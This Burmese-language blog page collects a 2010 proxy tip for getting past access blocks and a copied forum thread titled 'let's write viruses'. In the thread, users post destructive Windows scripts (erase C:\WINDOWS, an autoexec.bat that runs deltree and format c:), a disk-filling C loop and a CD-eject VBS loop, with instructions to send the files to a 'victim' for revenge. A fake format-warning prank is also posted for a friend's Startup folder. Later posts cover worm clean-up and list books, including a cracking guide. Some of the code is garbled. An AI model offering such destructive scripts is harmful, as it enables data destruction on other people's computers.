Wednesday, March 24, 2010

Blog Entry Access Denied ကို ေက်ာ္ဖို႔နည္းလမ္း

Original writer :္အခုခ်ိန္မွာ blogspot site ေတြအပါအ၀င္.....
တစ္ခ်ိဳ႕ေသာ site ေတာ္ေတာ္မ်ားမ်ားကို Access Denied ျဖစ္ေနတာမ်ားတယ္ဗ် ။
ဒါေတြကို proxy သံုးၿပီးေက်ာ္လို႕ရေပမယ့္.... တစ္ခါတစ္ခါ download
လုပ္ဖို႕က်ေတာ့ အဆင္မေျပဘူး mediafire လိုမ်ိဳးဆိုရင္ေပါ့ ။ ဒါေလးကို
အဆင္ေျပမယ့္ နည္းေလးက သင့္ browser ရဲ႕ internet setting မွာထည္႕တဲ့
proxy ကို အရင္ ygncache.mpt.net.mm
ဆိုတဲ့ေနရာမွာ...ygncache3.mpt.net.mmလို႕ေျပာင္းလုိက္ရင္
အဆင္ေျပသြားလိမ့္မယ္...ေကာင္းက်ိဳးအတြက္ သံုးခ်င္သူမ်ားအတြက္ပါ ဘာရည္ရြယ္
ခ်က္မွမ ပါဘူးေနာ္....ဟဲဟဲ....{ ျခြင္းခ်က္......တစ္ခါတစ္ေလမွာ Access
Denied ပဲ့ဆက္ျပေနတတ္တယ္... refresh လုပ္ဖို႕ F5 ကို
ဆက္တိုက္ႏွိပ္ေပးလိုက္ပါ....မရမခ်င္းေပါ့
}source:http://sites.google.com/site/alinnyaungdownload/Home/accessdenied

virus ေရးၾကည္.ရေအာင္

တခုေတာ.ေျပာျပမယ္ေနာ္ virus ဆိုေပမဲ. အစစ္ၾကီးေတာ.မဟုတ္ဘူး


စမ္းၾကည္..ရံုေပါ. ဟဲဟဲ ..ေနာက္ပိုင္းေတာ.ပညာ၇ွိသလိုသာ လုုပ္က်ေပါ.
မေကာင္းဘ ူးဗ်

ေျပာသာ ေျပာျပရတာ အေပ်ာ္ေပါ.

guengey

virus ေရးနည္းေလးေတြ share ရေအာင္ ။အေနာ္စရွာယ္ လိုက္ၿပီေနာ္ သိသေလာက္ရမ္း ၿပီ

Notepad ကိုဖြင့္.
TEST.txt(empty) ကို C ေဆာက္
"erase C:\TEST.txt" (without the quotes) လို႔ေရး
"Test.cmd" လို save as မွာ sace
Now run the file "Test.cmd" and go to C:\ and you'll see your Test.txt is gone.
Now, the real work begins:
Go to notepad and type erase C:\WINDOWS (or C:\LINUX if you have
linux) and save it again as findoutaname.cmd. Now DON'T run the file
or you'll lose your WINDOWS map. So, that's the virus. Now to take
revenge. Send you file to your victim. Once she/he opens it. Her/his
WINDOWS/LINUX map is gone. And have to install LINUX/WINDOWS again:P

1..echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* nul >>c:\autoexec.bat
echo copy c:\******s\command\forma.com c:\ >nul >>c:\autoexe.bat
echo copy c:\******s\command/deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltre /y c:\******s\*.* >nul >>c:\autoexec.bat
echoformat c:/q /u /autotest >nul >>c:\autoexe.bat

and save with .bat
2။Notepad ကိုဖြင့္.
TEST.txt(empty) ကို C ေဆာက္
"erase C:\TEST.txt" (without the quotes) လို႔ေရး
"Test.cmd" လို save as မွာ sace
Now run the file "Test.cmd" and go to C:\ and you'll see your Test.txt is gone.
Now, the real work begins:
Go to notepad and type erase C:\WINDOWS (or C:\LINUX if you have
linux) and save it again as findoutaname.cmd. Now DON'T run the file
or you'll lose your WINDOWS map. So, that's the virus. Now to take
revenge. Send you file to your victim. Once she/he opens it. Her/his
WINDOWS/LINUX map is gone. And have to install LINUX/WINDOWS again:P
*****************************************

erase command can do file deletion but not so easy to delete windows
folder it will ask you yes or no and need options to use see below.
Your code is not a virus it is just a batch file. That's a child
play.:P:P:P:P


Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

Deletes one or more files.

DEL [/P] [/F] [/S] [/Q] [/A[[:]attributes]] names

ERASE [/P] [/F] [/S] [/Q] [/A[[:]attributes]] names

names Specifies a list of one or more files or directories.
Wildcards may be used to delete multiple files. If a
directory is specified, all files within the directory
will be deleted.
/P Prompts for confirmation before deleting each file.
/F Force deleting of read-only files.
/S Delete specified files from all subdirectories.
/Q Quiet mode, do not ask if ok to delete on global wildcard
/A Selects files to delete based on attributes
attributes R Read-only files S System files
H Hidden files A Files ready for archiving
- Prefix meaning not
If Command Extensions are enabled DEL and ERASE change as follows:
The display semantics of the /S switch are reversed in that it shows
you only the files that are deleted, not the ones it could not find.
3။ဒါကေတာ့ C နဲ႔ :P

//START v.c
#include<stdio.h>
#include<stdlib.h>
void main()
{
while(1)
{
system("dir>>â•ša.exe");
}
}
//END
write In Borland C(Which has Dos Shell)
guengey
17-12-2008, 04:47 PM
cd rom virus code:
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If
ေလးကို copy ကူး ၿပီး name.vbs နဲ႔ save လိုက္ပါ။
cd rom virus (ေခၚ) အေၿခ ခံ program ေသးေသးေလးပါ
box02
17-12-2008, 05:12 PM
virus ေရးနည္းေလးေတြ share ရေအာင္ ။အေနာ္စရွာယ္ လိုက္ၿပီေနာ္ သိသေလာက္ရမ္း ၿပီ

Notepad ကိုဖြင့္.
TEST.txt(empty) ကို C ေဆာက္
"erase C:\TEST.txt" (without the quotes) လို႔ေရး
"Test.cmd" လို save as မွာ sace
Now run the file "Test.cmd" and go to C:\ and you'll see your Test.txt is gone.
Now, the real work begins:
Go to notepad and type erase C:\WINDOWS (or C:\LINUX if you have
linux) and save it again as findoutaname.cmd. Now DON'T run the file
or you'll lose your WINDOWS map. So, that's the virus. Now to take
revenge. Send you file to your victim. Once she/he opens it. Her/his
WINDOWS/LINUX map is gone. And have to install LINUX/WINDOWS again:P

ကို guengey ေရး .. nodepad နဲ႔ေရးလဲပဲ အစြမ္းထက္ပါတယ္။
ဒါေပမယ္႔ ကိုgeungey သိတဲ႔အတိုင္း Linux မွာ "C:\LINUX" ဆိုတာမရွိပါဘူး။
အဲဒီ c: drive ဆိုတာက MS Windows မွာသံုးတဲ႔ file structure ပါ။
Linux မွာက / (root), /dev, /usr, /opt, /home, အဲလိုရွိတာပါ။
ေနာက္ၿပီး Linux system administration ကို root user
ေတြသာလုပ္ပိုင္ခြင္႔ရွိတာပါ။ အဲဒီ root password ကို မသိပဲနဲ႔ေတာ႔ Linux
system ကိုဖ်က္ဖို႔ စိတ္မကူးလိုက္ပါနဲ႔။ ေနာက္ၿပီး /home ေအာက္က files
ေတြကို ခိုးဖို႔ကလဲ home user password ကိုမသိရင္ အနားေတာင္မကပ္ပါနဲ႔။
ေနာက္ၿပီး .exe က Windows ေပၚမွာ auto run လို႔ရေပမယ္႔ Linux ေပၚမွာလာမစမ္းပါနဲ႔။
အၿမီးေတာင္ မေထာင္ရဲေလာက္ေအာင္ အဲဒီ .exe ကငုတ္တုတ္ကေလးေနရမွာပါ။ Wine
မခံပဲ .exe files ေတြ run စရာအေၾကာင္းမရွိပါ။ အဲဒီေတာ႔ Linux ကို hack
ခ်င္ရင္ Linux ကိုကြ်မ္းေအာင္လုပ္ပါ။ :P :D
guengey

ကို guengey ေရး .. nodepad နဲ႔ေရးလဲပဲ အစြမ္းထက္ပါတယ္။
ဒါေပမယ္႔ ကိုgeungey သိတဲ႔အတိုင္း Linux မွာ "C:\LINUX" ဆိုတာမရွိပါဘူး။
အဲဒီ c: drive ဆိုတာက MS Windows မွာသံုးတဲ႔ file structure ပါ။
Linux မွာက \ (root), \dev, \usr, \opt, \home\, အဲလိုရွိတာပါ။
ေနာက္ၿပီး Linux system administration ကို root user
ေတြသာလုပ္ပိုင္ခြင္႔ရွိတာပါ။ အဲဒီ root password ကို မသိပဲနဲ႔ေတာ႔ Linux
system ကိုဖ်က္ဖို႔ စိတ္မကူးလိုက္ပါနဲ႔။ ေနာက္ၿပီး \home ေအာက္က files
ေတြကို ခိုးဖို႔ကလဲ home user password ကိုမသိရင္ အနားေတာင္မကပ္ပါနဲ႔။
ေနာက္ၿပီး .exe က Windows ေပၚမွာ auto run လို႔ရေပမယ္႔ Linux ေပၚမွာလာမစမ္းပါနဲ႔။
အၿမီးေတာင္ မေထာင္ရဲေလာက္ေအာင္ အဲဒီ .exe ကငုတ္တုတ္ကေလးေနရမွာပါ။ Wine
မခံပဲ .exe files ေတြ run စရာအေၾကာင္းမရွိပါ။ အဲဒီေတာ႔ Linux ကို hack
ခ်င္ရင္ Linux ကိုကြ်မ္းေအာင္လုပ္ပါ။ :P :D
ကို box ေရ ။ linux က virus နိုင္တယ္ ဆိုတာ အဲ႔ ေလာက္ ေတာင္ေသ ခ်ာ လာ :D
ဒါဆို Linux ကို ကိုက္တဲ႔ virus ေလာကမွာ မ ရွိေသးဘူး ေပ့ါ????? ။ ရွိရင္
name ေလးနဲ႔ နည္းနည္း ရွင္းၿပေပးေလ။
box02

ကို box ေရ ။ linux က virus နိုင္တယ္ ဆိုတာ အဲ႔ ေလာက္ ေတာင္ေသ ခ်ာ လာ :D
ဒါဆို Linux ကို ကိုက္တဲ႔ virus ေလာကမွာ မ ရွိေသးဘူး ေပ့ါ????? ။ ရွိရင္
name ေလးနဲ႔ နည္းနည္း ရွင္းၿပေပးေလ။

Linux Computer virus လဲရွိပါတယ္၊ က်ေနာ္ ဟုိဘက္မွာတစ္ခါတင္ထားတယ္ေလ ကိုguengey :)


http://www.mysteryzillion.org/forums/showthread.php?p=22360#post22360
Blue Sky

*****************************************

erase command can do file deletion but not so easy to delete windows
folder it will ask you yes or no and need options to use see below.

http://www.mysteryzillion.org/forums/showthread.php?p=18519#post18519
:):):)
Blue Sky

က်ေနာ့္ဆီမွာ computer-viruses-from-theory-to-applications-colle ...
ဆိုတဲ့ စာအုပ္ေလး႐ွိပါတယ္။ တင္ေပးရမလား မသိလို႔ပါ။ ေမာ္ေမာ္တို႔၊
မင္မင္တုိ႔ေရ...တင္ေပးရမွာလားဟင္။:):):)
guengey

က်ေနာ့္ဆီမွာ computer-viruses-from-theory-to-applications-colle ...
ဆိုတဲ့ စာအုပ္ေလး႐ွိပါတယ္။ တင္ေပးရမလား မသိလို႔ပါ။ ေမာ္ေမာ္တို႔၊
မင္မင္တုိ႔ေရ...တင္ေပးရမွာလားဟင္။:):):)
password ခက္ၿပီးတင္ေလ:D ။ Pm နဲ႔ password ေတာင္းမယ္ \:D/။ ေၿမာက္ေပးတာ။
အေနာ္လည္းလို ၿခင္လို :P။
istein

This is I love you virus code

http://www.mysteryzillion.org/forums/showpost.php?p=16813&postcount=27
Blue Sky

ဟုတ္ကဲ့။ လိုခ်င္တဲ့သူမ်ား က်ေနာ္ဆီကို pmပို႔ေတာင္းပါခင္ဗ်ာ။ က်ေနာ္
တင္မေပးေတာ့ပါဘူး။(မွတ္ခ်က္။ ။တင္မေပးဘူးဆိုေသာစကားကို
လံုးေကာက္အဓိပၸါယ္အတိုင္း မေကာက္ယူပါႏွင့္။ upload တင္မေပးျခင္းကို
ဆိုလိုသည္။):D:D:D
istein

က်ေနာ့္ဆီမွာ computer-viruses-from-theory-to-applications-colle ...
ဆိုတဲ့ စာအုပ္ေလး႐ွိပါတယ္။ တင္ေပးရမလား မသိလို႔ပါ။ ေမာ္ေမာ္တို႔၊
မင္မင္တုိ႔ေရ...တင္ေပးရမွာလားဟင္။:):):)

ဒါကေတာ့ ေမးေနစရာ လိုပါဝူး။ တင္လို႕ရပါတယ္ခင္ဗ်ာ။
Blue Sky

ကဲဒါဆိုရင္ ေရာ့ယူလိုက္ (http://ifile.it/a96lxd0) :D:D:D
guengey

ကဲဒါဆိုရင္ ေရာ့ယူလိုက္ (http://ifile.it/a96lxd0) :d:d:d
ေက်းဇူး ပဲ ေနာ္ ။ ေဒါင္းလိုက္ပါ ၿပီ
skyblue.ster

Virus အတုေလးပါ... :D
ပထမဆံုး notepad ကိုဖြင့္ျပီး ေအာက္က ကုတ္ေလးေတြကို ကူးယူလိုက္ပါ။

Code:
LOL=msgbox("The virus have beeb detecten! Press YES to format your
hard disc now, or press NO to format your hard disc after the system
reboot", 20, "VIRUS WARNING")
ျပီးရင္ virus.VBS နဲ႔ save လိုက္ပါ။ ရလာတဲ့ .VBS ဖိုင္ေလးကို စခ်င္တဲ့
သူငယ္ခ်င္းရဲ႕ ကြန္ပ်ဴတာထဲကို ကူးယူျပီး
start -> All programs -> Startup ဆိုတဲ့ ဖိုင္ေလးထဲ သြားထည့္ေပးလိုက္ပါ။
ျပီးရင္ေတာ့ ေနသားတက် ျပန္ပိတ္ထားလိုက္ပါ။ သူငယ္ခ်င္း ကြန္ပ်ဴတာ
စဖြင့္တဲ့ အခ်ိန္မွာ .VBS ဖိုင္ေလး အလုပ္လုပ္ျပီး warning စာတမ္းေလး
တတ္လာပါလိမ့္မယ္။ ဒါဆိုရင္ေတာ့ သူငယ္ခ်င္း လန္႕ျဖန္သြားလိမ့္မယ္.... :D
မွတ္ခ်က္... တကယ့္ virus မဟုတ္ပါ။ ထိုအတြက္ မည္သည့္ အန္တီဗိုင္းရက္စ္နဲ႔
စစ္စစ္မေပၚနိုင္ပါ။ ကြန္ပ်ဴတာအတြက္ မည္သည့္ အႏၱာရာယ္မွ မရွိေၾကာင္း
အာမခံပါတယ္။
ျပန္ျဖဳတ္ခ်င္ရင္ေတာ့ Startup ထဲက .vbs ဖိုင္ေလးကို ျပန္ထုတ္လိုက္ရံု၊
ဒါမွမဟုတ္ delete လုပ္လိုက္ရံုပါပဲ...

မိမိေပ်ာ္ရႊင္မွဳအတြက္ သူတပါ စိတ္အၾကီးအက်ယ္ ဆင္းရဲေအာင္ မလုပ္မိပါေစနဲ႔.... :68:

ဗိုင္းရပ္ေရးခ်င္သလား

ဒီဗိုင္းရပ္က သတ္ၿပီးတာ ၾကာပါၿပီ … အခ်က္အလက္ မစံုတာနဲ႔ ျပန္မေရးျပ ျဖစ္တာဗ် .. ။ ဗဟုသုတ အေနနဲ႔ ေရးလိုက္ပါတယ္..။ အစက ဗိုင္းရပ္ကိုပါ ျပန္မွ် ေပးႏိုင္ေအာင္ ရွာေနတာဗ် .. ။ မေတြ႔ေတာ႔ တာနဲ႔ ဒီတိုင္းေလးပဲ ေရးလိုက္တယ္ဗ်ာ … ။

ဗိုင္းရပ္ သက္ေရာက္မႈ ေတြကေတာ႔ ……………  

1 … Anti-virus က ေနၿပီး Virus delete ဆိုၿပီး အဆက္မျပတ္ျပေနပါတယ္။ တကယ္ မသတ္ေပးႏိုင္ပဲ သံသရာ လည္ေနတာပါ။
I:..MS32DLL.dll.vbs virus is deleted
E:..MS32DLL.dll.vbs virus is deleted

ဆိုၿပီး တစ္လွည္႔စီ ကၽြီကၽြီ နဲ႔ ေအာ္ေနပါတယ္။ (ကံဆိုးစြာနဲ႔ပဲ သူ႔ကြန္ပ်ဴတာမွာ တင္ထားတဲ႔ Anti-virus က Avast ျဖစ္ေနျပန္ပါတယ္။ ေဖာက္သည္ႀကီးက ဒီတစ္ခါ လည္း ကံဆိုးျပန္ၿပီေပါ႔)

2 … Drive ေတြကို ဘယ္လိုပဲ ဖြင္႔ဖြင္႔ မရပါဘူး။ ေအာက္ပါပံု အတိုင္း F ကို ဖြင္႔ရင္ cannot find script file "F:MS32DLL.dll.vbs" , C ကို ဖြင္႔ရင္ cannot find script file "C:MS32DLL.dll.vbs" လို႔ လာျပပါတယ္။
Image Hosting by  Picoodle.com


က်န္တာေတြေတာ႔ က်ေနာ္လည္း ေသခ်ာ ၾကည္႔ဖို႔ အခ်ိန္မရလိုက္ဘူး .. ။ သူကလည္း Appointment နဲ႔ ဆိုေတာ႔ ေလ .. ။ အဲဒါနဲ႔ ပဲ ကမန္းကတန္းနဲ႔ သတ္လိုက္ပါတယ္။
MS32DLL.dll.vbs virus ကို remove လုပ္ခဲ႔တဲ႔ မွတ္တမ္းေတြ ရွာၾကည္႔ေတာ႔ က်ေနာ္ အရင္ေရးထားတဲ႔ Godzilla ဗိုင္းရပ္ကို ရွင္းတဲ႔ နည္းနဲ႔ တူပါတယ္။ အဆင္႔ ၆ registry editor မွာ Window Title "Hacked by Godzilla" ကို Delete လုပ္ေပးစရာ မလိုတာတစ္ခုပဲ ကြာပါတယ္ ။ ဒီမွာ ျပန္ဖတ္ၾကည္႔ပါ။

ဒါေပမယ္႔ က်ေနာ္ သူ႔ကြန္ပ်ဴတာမွာ အဲဒီနည္းနဲ႔ အဆင္မေျပပါဘူး။
1 … Folder option ကို show ေပးလည္း ေျပာင္းမသြားပါဘူး။
2 … Drive ေတြကို ဘယ္လိုမွ ဖြင္႔မရဘူး။
3 … Winrar နဲ႔လည္း Drive ေတြ ကို ဖြင္႔ၾကည္႔လို႔ မရပါဘူး။
4 … Tesk Manager မွာလည္း wscript.exe ကို မေတြ႕ပါဘူး ။

အဲဒါနဲ႔ပဲ တင္ထားတဲ႔ Avast Anti-Virus ႀကီးကို ျပန္ျဖဳတ္ၿပီး Kaspersky Anti-Virus 7 ကို ေျပာင္းတင္လိုက္ပါတယ္။ တင္ၿပီးလို႔ Update လုပ္ေနတုန္းမွာပဲ တစ္ခါတည္း Scan ပါ စစ္ထားလိုက္ပါတယ္။ အရင္အတိုင္းပဲ
I:..MS32DLL.dll.vbs virus is deleted
E:..MS32DLL.dll.vbs virus is deleted
ဆိုၿပီး တစ္လွည္႔စီ ကၽြီကၽြီ နဲ႔ ေအာ္ေနတုန္းပါပဲ ။ Updated ၿပီးေတာ႔ Restart လုပ္ေပးလိုက္တယ္။ ျပန္တက္လာေတာ႔ Scan ဆက္စစ္ၿပီး သူက ဗိုင္းရပ္လို႔ ေျပာသမွ်ကို Delete ေပးလိုက္တယ္ေပါ႔ဗ်ာ … ။ အဲလိုနဲ႔႔ပဲ စစ္လို႔ ၿပီးသြားတဲ႔အခ်ိန္မွာ Virus Deleted ဆိုတဲ႔ alert ေတြ မလာေတာ႔ဘူးဗ် … ။ အဲဒါနဲ႔ Drive ေတြ ဖြင္႔ၾကည္႔ေတာ႔ မရေသးဘူးဗ် ။ အရင္အတိုင္း cannot find script file "C:MS32DLL.dll.vbs" လို႔ လာေျပာေနတုန္းပဲ ။ အဲဒါနဲ႔ C ကို Winrar နဲ႔ ဖြင္႔ၿပီး AUTORUN.inf ဆိုတာကို ဖ်တ္ေပးလိုက္ပါတယ္။
Run မွာ regsvr32 /i shell32.dll
အဲလိုေရးလိုက္ရင္ ေအာက္ပါအတိုင္း Alert ေပၚလာပါမယ္ ။ Ok ေပးလိုက္ပါ။
Image Hosted by ImageShack.us
Tesk Manager ေလးနဲ႔ Re-initialize လုပ္ေပးလိုက္ပါတယ္။ (re-initialize လုပ္ဖို႔ ဒီမွာ ေရးၿပီးပါၿပီ)

အားလံုးျပန္အဆင္ေျပ သြားပါတယ္.. ။ က်ေနာ္ လုပ္ခဲ႔တဲ႔ နည္းေလးကို ျပန္ေျပာျပတာ ျဖစ္ပါတယ္ …. တကယ္လို႔ အသံုး၀င္ခဲ႔တယ္ ဆိုရင္ အရမ္းကို ၀မ္းသာရမွာပါ … ။ ၿပီးဆံုးေအာင္ ဖတ္ေပးလို႔ ေျပာေနက်အတိုင္း Thank you ပါ … ေက်းဇူး အမ်ားႀကီး တင္ပါတယ္ .. ။

lose Folder Options (ေပ်ာက္ဆုံးျခင္း)

ကြန္ျပဴတာမွာ Folder Options ေပ်ာက္သြားလို႔ ခဏေလာက္ေတာ့ ေခါင္းစားသြားရပါတယ္။ စဥ္းစားခန္းဖြင့္လုိက္ေသးတယ္။ ဘယ္နဲ႔ေပ်ာက္သြားရတာပါလိမ္႔။ Folder Option ဆုိတာကုိ မိမိရဲ႕ကုိယ္ေရးကုိယ္တာ ဒါမွမဟုတ္ အမ်ားကုိမျမင္မေတြ႕ေစခ်င္တဲ႔ file (or) folder မ်ားကုိ ျမင္ကြင္းမွ ေဖ်ာက္ထားျခင္း၊ ျမင္ကြင္းေပၚသုိ႔ ျပန္ေရာက္ေအာင္ ျပန္ေခၚ ျခင္းတုိ႔မွာ မ်ားေသာအားျဖင့္ အသုံးျပဳတတ္ၾကပါတယ္။

က်ေနာ္လည္း file တစ္ခ်ိဳ႕ကုိ ေဖ်ာက္ထားမလုိ႔ လုပ္မယ္အႀကံမွာ Tools ထဲမွာ Folder Options ရွိမေနဘူး။ ဒါမ်ား ခက္တာမွတ္လုိ႔ Control panel ထဲကုိသြားမွာေပါ႔။ ေရာ အဲဒါမွ ခက္ၿပီး . . . Control panel ထဲမွာ လည္း မရွိဘူးဗ်။ ဘယ္လုိလုပ္ရမလဲ ? အဲဒီေတာ့ က်ေနာ့္ဆရာေတြအထဲက က်ေနာ္နဲ႔အနီးဆုံးရွိေနတဲ႔ ဆရာကုိေမးရေတာ့မွာေပါ႔။ အဲလုိနဲ႔ က်ေနာ္႔ဆရာတစ္ဦးျဖစ္တဲ႔ google.com ဆီ၀င္ေမးလိုက္ရပါတယ္။

Folder Options ေပ်ာက္ဆုံးျခင္းဟာ ဗုိင္းရပ္စားတာ ျဖစ္ႏုိင္ပါတယ္တဲ႔။ ကဲ႔ ေပ်ာက္သြားတဲ႔ Folder Options ကုိ က်ေနာ္တုိ႔ ျပန္ေခၚ ၾကရေအာင္ . . .

အရင္ဆုံး Start ထဲက Run ဆီကုိသြားရပါမယ္။
Run box ထြက္လာတဲ႔အခါမွာ gpedit.msc ကုိရိုက္ၿပီး ok ေပါ႔။

ကဲ ေပၚလာတဲ႔ box ထဲမွာမွ . . . .
User Configuration -> Administrative Template -> Windows Components -> Windows Explorer
အဲလုိ တစ္ဆင့္ၿပီးဆင့္သြားလုိက္ေပါ႔။

ထြက္လာတဲ႔ Box ေလးထဲမွ Removes Folder Options menu from Tools menu ကုိရွာလုိက္ၿပီး ၂ခ်က္ ကလင့္လုိက္ပါ။ ထပ္ထြက္လာတဲ႔ box ထဲက Disable ကုိေရြးလုိက္ေပ႔ါ။

ကဲ႔ အဲဒါေတြအားလုံးၿပီးရင္ေတာ့ က်ေနာ္တုိ႔ Control panel ထဲမွာေရာ Tools ထဲမွာပါ Folder Options ျပန္ေတြ႕ ပါလိမ္႔မယ္။ အားလုံးအဆင္ေျပၾကပါေစဗ်ာ . .

နည္းပညာ/ကြန္ျပဴတာ

ကြန္ျပဴတာနဲ႔ အျခားနည္းပညာပုိင္းဆုိင္ရာစာအုပ္မ်ား ဆုိင္ရာစာအုပ္စင္..

  1. ကြန္ျပဴတာ အေမးအေျဖမ်ား – ကြန္ျပဴတာဂ်ာနယ္စာတည္းအဖြဲ ႕ ( 21 feb 2009)
  2. ကြန္ျပဴတာဂ်ာနယ္ 01/08 ( 21 feb 2008)
  3. ကြန္ျပဴတာဂ်ာနယ္ 02/08 ( 21 feb 2008)
  4. ကြန္ျပဴတာဂ်ာနယ္ 03/08 ( 21 feb 2008)
  5. ကြန္ျပဴတာဂ်ာနယ္04/08 ( 21 feb 2008)
  6. ကြန္ျပဴတာဂ်ာနယ္ 05/08 ( 21 feb 2008)
  7. ကြန္ျပဴတာဂ်ာနယ္ 06/08 ( 21 feb 2008)
  8. ကြန္ျပဴတာဂ်ာနယ္ 07/08 ( 21 feb 2008)
  9. ကြန္ျပဴတာဂ်ာနယ္ 08/08 ( 21 feb 2008)
  10. ကြန္ျပဴတာဂ်ာနယ္ 09/08 ( 21 feb 2008)
  11. ကြန္ျပဴတာဂ်ာနယ္ 10/08 ( 21 feb 2008)
  12. ကြန္ျပဴတာဂ်ာနယ္ 11/08 ( 21 feb 2008)
  13. ကြန္ျပဴတာဂ်ာနယ္ 12/08 ( 21 feb 2008)
  14. ဘေလာဂ့္ဂါလက္စြဲ (pdf)
  15. Adobe Pagemaker 7.0 (Burmese Version) (pdf)
  16. AutoCAD 2002 ( Myanmar) by Robert Tin Aye
  17. Cracker Guide 1.1 by Myanmar Cracking Team (pdf)
  18. how to install wp on byethost by mmwordpress
  19. How to Create New Partition in External Hard Disk by Maung Naing (pdf)
  20. HTML by Saturngod (pdf)
  21. Linux OS Myanmar (pdf)
  22. Making a blog by suntan god
  23. Saturn God – Installation Guide for Ubuntu
  24. Saturn God – Ubuntu 8.04 Installation
  25. Saturn God – How to Make WiKi
  26. Saturn God – HTML (second Edition)
  27. How to Use Gmail
  28. iPhone Unlock
  29. VisualBasic6.0 in Burmese (pdf)
  30. Web Design လက္ေတြ႕သင္ခန္းစာမ်ား ( 21 feb 2009)